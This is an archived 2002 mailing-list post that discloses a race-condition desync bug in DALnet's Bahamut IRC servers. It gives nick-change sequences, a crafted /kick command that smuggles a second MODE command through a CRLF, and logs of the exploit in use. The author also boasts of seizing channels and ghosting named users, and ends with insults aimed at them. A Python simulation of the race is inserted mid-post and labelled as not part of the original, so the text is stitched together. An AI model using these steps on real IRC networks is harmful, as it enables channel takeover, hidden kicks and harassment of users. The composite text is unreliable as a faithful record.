weird bahamut (and possibly others) sync bug

From: ET (bofhat_private)
Date: Thu Feb 14 2002 - 18:58:42 PST

    =================== WEIRD DALNET SYNC BUG =========================
    (my first post! don't bug me if I didn't get it picture perfect)
    Author:  Enstyne
    Contact: irc.cyberarmy.com #cyberarmy
    
    Dates:   June 8 2001 -- original document
                 Feb  9 2002 -- revised for distribution
    
    -----------------------------------------------------
    VENDOR STATUS:
    I notified the DALnet Bahamut crew almost 2 years ago.
    I was slightly sketchy on info, but as clearly as I explained
    it, they thought I was "just describing lag".
    A friend of mine 'llthangel' was there at the time, part
    of the UnrealIRCd team. He was also turned away as if
    this was useless info.
    
    Two years is enough time to test/acknowledge a problem, in my opinion.
    -----------------------------------------------------
    
    PLEASE NOTE: this exploit has lots of variables. I have
    reproduced the effect more than 100 times on many different
    occasions, including a few days before this document.
    Also note that this is very hard for me to explain in words
    and to get the idea in my head across. Don't ask...
    It works, and many people are witnesses to it being used
    several times.
    -----------------------------------------------------
    
    REPERCUSSIONS:
    I have reproduced the following effects using this bug:
    Invisibility on channels
    Invisible Operator Status (kick people while deoped, etc)
    Invulnerability to CHANSERV MKICK and CHANSERV DEOP
    Complete acquisition of /WHOIS info from the remote party involved
       ^^^ That means you can kind of hide your host.
    -----------------------------------------------------
    
    OVERVIEW:
    Assessment: This is (I think) a bug in the TS3 protocol.
    
    Requirements: more lag in one direction than the other
                   between two separate servers. (Don't ask, it happens)
    
    Comments:
    This probably works on lots of networks other than DALnet,
    but DALnet is the one I've tested it on. It seems like a
    "race condition" exploit due to the requirement of lag;
    it used to give you a few minutes until you saw some
    movement on the other side, it was so bad....
    -----------------------------------------------------
    
    
    DESCRIPTION:
    I'll take for this example two clients, and a US and an EU server
    that have been connected a long way away from each other, as the lag is
    generally greater over greater distances between servers.
    
    Now, you both join them to a channel...
    say,
    #ch0wn
    
    then in the channel you have both nicks like
    Ens1 and Ens2
    
    Ens1 on US.dal.net
    Ens2 on EU.dal.net
    
    ------------------------------------
    Please note that the messages going from the EU->US server go
    faster than the messages going US->EU.
    This is a strange (beats me) but vital part of the exploit.
    ---------------------------
    
    Part 1):
    UK Screen:
    
    **** Now talking in #ch0wn
    	(/nick Enspine | nick halfghost )
    *** Ens1 is now known as Enspine
    *** Enspine is now known as halfghost
    *** Ens2 is now known as Enspine
    
    Part 2):
    US Screen:
    
    **** Now talking in #ch0wn
    (/nick Enspine)
    *** Ens2 is now known as Enspine
    (a couple of seconds/minutes later)
    *** Ens1 has quit IRC (Killed (EU.dal.net -> (Enspine) US.dal.net)
    
    
    ----------------------------
    
    But since the person being killed is "Enspine" on the US side, which
    does not exist on that side but on the EU side, the kill path is flawed,
    and it is therefore rejected on all but the EU server.
    
    The result of all this becomes that the nick "halfghost" on the
    US server does not exist on all parts of the network.
    
    Any command that goes through the servers this nick does not exist
    on will result in a kill message such as:
    *** halfghost has quit IRC (Killed (EU.dal.net -> (halfghost(?)) US.dal.net))
    
    To test this you could use something like:
    ./whois chanserv == won't kill
    ./whois EU.dal.net chanserv == will kill
    
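    The race walked through above, as an added example that is not part of the
    original post and not Bahamut or DALnet code: a small discrete-event model in
    Python in which two servers exchange NICK and KILL messages over a link whose
    one-way delay differs per direction. The message layouts, the user ids (u1, u2,
    svc), the delay values and the ChanServ entry are constructed assumptions, as is
    the rule that a KILL names its victim by nick plus the victim's home server and
    is rejected wherever that pair does not match; none of this is Bahamut's actual
    TS3 handling. Under those assumptions it reproduces what the post reports: after
    the collision "halfghost" exists on the US server but not on the EU one, a local
    /whois is harmless, and a /whois routed via the EU server gets halfghost killed.

```python
"""Discrete-event model of the nick-collision race described above (added
illustration, not Bahamut/DALnet code). Assumed: two linked servers, a fixed
one-way delay per direction (the asymmetric lag), NICK carrying a stable user
id, and KILL naming its victim by nick plus home server (rejected if mismatched)."""
import heapq

class Net:
    def __init__(self, delays):
        self.delays = delays                          # {(src, dst): seconds}
        self.servers = sorted({s for link in delays for s in link})
        self.nicks = {s: {} for s in self.servers}    # each server's view: nick -> uid
        self.home = {}                                # uid -> server the client sits on
        self.log = {s: [] for s in self.servers}
        self.queue, self.seq = [], 0                  # heap of (time, seq, server, msg)

    def _send(self, t, server, msg):
        self.seq += 1                                 # seq keeps equal-time events FIFO
        heapq.heappush(self.queue, (t, self.seq, server, msg))

    def _relay(self, t, origin, msg):                 # forward to every other server
        for dst in self.servers:
            if dst != origin:
                self._send(t + self.delays[(origin, dst)], dst, msg)

    def connect(self, nick, uid, home):               # client already known network-wide
        self.home[uid] = home
        for s in self.servers:
            self.nicks[s][nick] = uid

    def nick_of(self, server, uid):
        return next((n for n, u in self.nicks[server].items() if u == uid), None)

    def nick(self, t, uid, old, new):                 # client types /nick on its home server
        self._send(t, self.home[uid], ("NICK", uid, old, new))

    def whois(self, t, uid, target, via):             # /whois [via] target, the post's check
        home = self.home[uid]
        delay = 0.0 if via == home else self.delays[(home, via)]
        self._send(t + delay, via, ("WHOIS", self.nick_of(home, uid), target, home))

    def run(self):
        while self.queue:
            t, _, server, msg = heapq.heappop(self.queue)
            self._handle(t, server, msg)

    def _handle(self, t, here, msg):
        table, log = self.nicks[here], self.log[here]
        if msg[0] == "NICK":
            _, uid, old, new = msg
            if table.get(old) != uid:                 # sender renamed again before this arrived
                log.append(f"{t:.1f} ignore stale NICK {old}->{new}")
            elif new in table and table[new] != uid:  # collision: kill the newcomer by nick name
                del table[old]
                log.append(f"{t:.1f} KILL {new} (collision)")
                self._relay(t, here, ("KILL", new, self.home[uid], here))
            else:
                del table[old]
                table[new] = uid
                log.append(f"{t:.1f} {old} -> {new}")
                if self.home[uid] == here:            # only the home server propagates
                    self._relay(t, here, msg)
        elif msg[0] == "KILL":
            _, target, claimed_home, killer = msg
            uid = table.get(target)
            if uid is None or self.home[uid] != claimed_home:
                log.append(f"{t:.1f} reject KILL {target} from {killer}: bad path")
            else:
                del table[target]
                log.append(f"{t:.1f} {target} killed by {killer}")
        elif msg[0] == "WHOIS":
            _, source, target, origin = msg
            if table.get(source) is None or self.home[table[source]] != origin:
                log.append(f"{t:.1f} unknown source {source}(?) -> KILL")
                self._send(t + self.delays[(here, origin)], origin, ("KILL", source, origin, here))
            else:
                log.append(f"{t:.1f} WHOIS {target}: {'found' if target in table else 'no such nick'}")

DELAYS = {("US", "EU"): 2.0, ("EU", "US"): 0.5}       # constructed: US->EU slower than EU->US

def nick_race():
    """Ens1 (US) goes Enspine then halfghost while Ens2 (EU) goes Enspine."""
    net = Net(DELAYS)
    net.connect("Ens1", "u1", "US")
    net.connect("Ens2", "u2", "EU")
    net.connect("ChanServ", "svc", "EU")              # constructed whois target
    net.nick(0.0, "u1", "Ens1", "Enspine")
    net.nick(0.0, "u2", "Ens2", "Enspine")
    net.nick(0.1, "u1", "Enspine", "halfghost")
    net.run()
    return net

def whois_after_race(via):
    """The post's check: /whois ChanServ answered locally vs. routed via EU."""
    net = nick_race()
    net.whois(10.0, "u1", "ChanServ", via)
    net.run()
    return net
```

    Call nick_race() and compare net.nicks["US"] with net.nicks["EU"], then
    whois_after_race("US") against whois_after_race("EU"); the per-server
    net.log lists show the stale NICK being ignored on EU, the KILL for
    "Enspine" being rejected on US because the nick there belongs to a client
    homed on EU, and the "unknown source" kill that a remote /whois triggers.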
    -----------------------------
    
    Now we can build us up a cool packet
    like /kick #ch0wn Chawmp . $+ $crlf $+ MODE #ch0wn +inm
    This will only happen locally, as all the other servers
    will reject the message. Chawmp will not auto-rejoin,
    and "halfghost" will get killed by the server.
    
    Chawmp is on the EU server, by the way.
    
    Every time he speaks he'd get a message
    from the desync'd server saying that he's not on the channel.
    If he rejoins and doesn't get opped, then he will also get messages
    about the moderated channel, yet he will see +m is not set!
    
    The funny thing about desyncs is that when you desync something,
    it can sometimes start to spread more than what you started.
    
    Say Chawmp is opped on #ch0wn but has been "locally kicked" by halfghost,
    then a guy named "lamer" joins on any server.
    If Chawmp ops him, he won't be opped on the US server!
    
    Therefore now the EU server has its share of desyncs too,
    especially if "lamer" starts setting channel modes.
    
    Also, you may be able to empty a channel of people with the halfghost
    and they would never know; then you can join a client onto the US
    server and get opped by the server, and not deopped by ChanServ
    (if you're lucky), and it would look, on the EU server, like you're not opped
    at all.
    
    -----------------------------
    The only aliases I used for the test were (on mIRC):
    /col /nick Enspine
    /cob /nick Enspine | /nick Enx435
    
    ^^^ lol, if you are using those to test this out I wish you good luck.
    -----------------------------
    
    
    
    
    
    LOGS OF EXPLOIT BEING EXECUTED:
    -------------------------------
    (from one client's view)
    [23:34] <wa1800z> it's a hole bigger then their irc addicted asses but they dun wanna admit it
    [23:34] <Chawmp> Enstyne, do the sploit again! :)
    [23:34] <wa1800z> lol
    [23:34] <Enstyne> okay, but if i get klined
    [23:34] <Chawmp> want whoot :)
    [23:34] <Enstyne> it's Chawmp's fault
    [23:35] <Enstyne> lol
    [23:35] <Chawmp> Enstyne :)
    [23:35] <wa1800z> noted
    [23:35] <wa1800z> ;)
    [23:35] <Chawmp> i'd give you a shell....
    [23:35] <Chawmp> but i only g0t 56k :_)
    [23:35] <Enstyne> lol
    [23:35] <Enstyne> i know
    [23:35] <Enstyne> i already have a root shell Chawmp
    [23:35] <Enstyne> lol... j/k
    [23:36] <Chawmp> lol :)
    [23:36] *** Enstyne is now known as Ens|US
    [23:36] <Chawmp> heheh
    [23:36] *** Ens|US is now known as Enspine
    [23:36] *** Enspine is now known as Enstyn
    [23:36] <Enstyn> hmmmmmm
    [23:36] <Enstyn> seems to have worked
    [23:36] <Enstyn> :)
    [23:36] <Enstyn> let's check
    [23:36] <Chawmp> ooo... that quick?!?!
    [23:37] <Enstyn> brb
    [23:37] *** Disconnected
    Session Close: Tue Oct 31 23:37:18 2000
    
    
    
    
    LOGS OF EXPLOIT BEING EXECUTED:
    -------------------------------
    (SEPARATE INCIDENT, THIS ONE MAY BE EASIER TO UNDERSTAND)
    (server A)
    [20:57] *** Enstyne is now known as Enspine
    [20:57] *** Enspine is now known as Enstyn
    
    (server B)
    [20:57] *** Ens|UKKKkkk is now known as Enspine
    (the other chnick to Enspine got through then and killed me)
    [20:57] *** Disconnected
    
    (server A)
    [20:57] *** Ens|UKKKkkk is now known as Enspine
    [20:57] <Enstyn> hmmmmm
    [20:57] <Enstyn> how many do you see?
    [20:57] <Chawmp> 2 ppl...
    [20:57] <Chawmp|UK> 1 person
    [20:57] <Chawmp> 2
    [20:57] <Chawmp|UK> 1
    [20:57] <Enstyn> lol
    [20:57] <Enstyn> okay
    [20:57] <Enstyn> that worked
    [20:58] <Chawmp|UK> !!!
    [20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message for jullia^!~banasorat_private From adm Path: philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
    [20:58] <Chawmp|UK> yAY
    [20:58] * Enstyn thinks
    [20:58] <Enstyn> what do i do next
    [20:58] <Enstyn> hmmmmmm
    [20:58] <Chawmp|UK> :)
    [20:58] <Enstyn> Chawmp: what's the "invisi" persons nick
    [20:58] <Enstyn> since i'm "Enstyn"
    [20:58] <Chawmp|UK> well
    [20:58] <Enstyn> what's the other?
    [20:58] <Chawmp|UK> must be enspine then
    [20:58] <Enstyn> yep
    [20:58] -twisted.ma.us.dal.net- *** Notice -- Received KILL message for angelia``!~banasorat_private From adm Path: philly!katchoo.vma.verio.net!adm (Stop the mass inviting)
    [20:58] <Chawmp|UK> enspine: No such nick/channel
    [20:58] <Enstyn> okay.. join #cyberarmy with chawmp|UK
    [20:58] <Chawmp> Enspine (adminat_private) [Unknown]
    [20:58] <Chawmp> :)
    [20:59] <Chawmp|UK> ok...
    [20:59] <Enstyn> then change nick to Enspine
    [20:59] <Chawmp|UK> done
    [20:59] <Enstyn> exactly
    [20:59] *** Chawmp|UK has quit IRC (Killed (netropolis-r.uk.eu.dal.net (lineone.uk.eu.dal.net(Enspine) <- lineone.uk.eu.dal.net[unknown@localhost])))
    [20:59] <Enstyn> your invis!
    [20:59] <Enspine> done
    [20:59] <Chawmp> !!!!
    [20:59] <Chawmp> !!!!!
    [20:59] <Chawmp> r00t!
    [20:59] <Enstyn> LOl
    [20:59] <Enstyn> you are!~!@!
    [21:00] <Chawmp> argh
    [21:00] <Chawmp> i cant operize
    [21:00] <Enstyn> Chawmp: i'll go op you
    
          ^^^^ note that in the above he had become invisible to services
               well, in a way, because they also thought he wasn't on the
               channel he was requesting ops on.
               It looked like Chawmp|UK had died but i was just on a server
               which got the invisibility effect. "Chawmp|UK" turned
               into Enspine afterwards... and kind of brought it back to
               life :)
    
    
    
    -------------------------------
    FINAL NOTES:
    I hope at least one person on this mailing list can understand this.
    I have also exploited this bug before by using NickServ GHOST (figure it
    out, same concept):
    ghost the nick on the US server, then at the same time change the nick getting
    ghosted by NickServ to a different nick... if it says 'nick whatever was ghosted'
    and the client didn't get disconnected, then it works..... think of the
    possibilities :)
    
        ---------------------------------------------------------------------------------------
    SHOUTS:
    Anyone interested in the matrix && irc... should really take a look at this:
    http://cashells.massiveisp.net/~ens/matrixstory.txt
    
    Shouts tew the ch0wn krew! on irc.cyberarmy.com
    the people of the ch0wn krew went through extensive confusion as
    I developed this exploit; actually even I was pretty confused.
    Chawmp  - in this case, you weren't confused, you were just loving it. lol.
    ¿g0t? is chawmp's trademark.
    keoki   - for kicking the people i wouldn't dare while invisible under the 
    effect. lol
    wa1800z - you seem way too busy nowadays for *
    shad    - for telling me to "write it up" instead of trying to explain it 
    every time. kraft addict
    think12 - you seem to have a remarkable tolerance for the weird c**p i do, 
    unbottle though!
    gM      - haha, i always forgot to include you before, so you're in now! 
    (gM knows his irc stuff)
    nsh     - college life catchin' up on ya? brilliant mind this guy has.
    The_Itch- he views the world through cee-debug glasses, irc wizard! (and 
    has lots of 0days too, so annoy him)
    (AND OTHERS TOO) :)
    
    xtra shouts to the #cyberarmy, irc.cyberarmy.com crew
    Cass (Weapon of choice, Loki of the attackbots)
    Di]v[pLes (taken so much stick and given so much)
    matt999 (the Matt that isn't vulnerable to +++ATH0)
    darkroot (who sooooo wanted me to give him this info to him first hehe)
    blexim (tonnes of testing and messing about. lol)
    hellz (we used holodeck irc sim program to msg this guy w/ 12,000 bots)
    Quantum_Knight (man, you relieve me of my sanity)
    Kaladis (for observing experiments in #cyberarmy with laughter)
    (+ OTHERS I FORGOT) it's 2am today and i'm exhausted, bleh :)
    
    w1z - lmao man, that was so funny when we made you receive the wrong whois
          info and turned you invisible so BaDaSSS couldn't do anything. Hahaha.
    
    Chawmp, keoki and I took over DALnet #kkk for a couple of hours with this 
    (hush hush).
    This exploit is dedicated to Douglas Adams, the Shakespeare of our modern 
    world.
    
        ---------------------------------------------------------------------------------------
    ANTI-SHOUTS:
    BaDaSSS - you are one of the silliest people I've ever met, you will never
              get anywhere unless you accept things and seek professional help.
              You cried to me after losing your aop in #cyberarmy and then
              nagged llthangel about it for years afterwards... pssht...
              and I thought you "didn't give a *" ... you've had it coming for
              a long long time.
    
              p.s. haha, I owned your services and ghosted your ass from your
              own network.
    
    Ron885 - Same story except you didn't strike it lucky and get aop in #cyberarmy.
             You took all the wrong turns man and ended up in lamerville. Also
             got ghosted.
    
    script0r - you were okay, but then you turned into an almost hitler-like
               domineer. You still are good natured at heart though. -Ghosted-
               (only because you started setpassing)
    
    Wacko/MaxD/MaxDemian/whatever - Wacko(ff) you are so unbelievably blind a
               bat would pity you.
               "you don't winsock to make a http request, you use INet you
               ..." (erm, yeah, ok)
               like it matters. Most of the people you think like you wacko
               don't. Believe me, because they've told me. This guy had to beg for
               crazyhorse to stop conconing his oh-so-elite vb webserver he'd
               coded up. I wonder if he used Inet for that as well :)
        ---------------------------------------------------------------------------------------
    



    This archive was generated by hypermail 2b30 : Thu Feb 14 2002 - 19:58:28 PST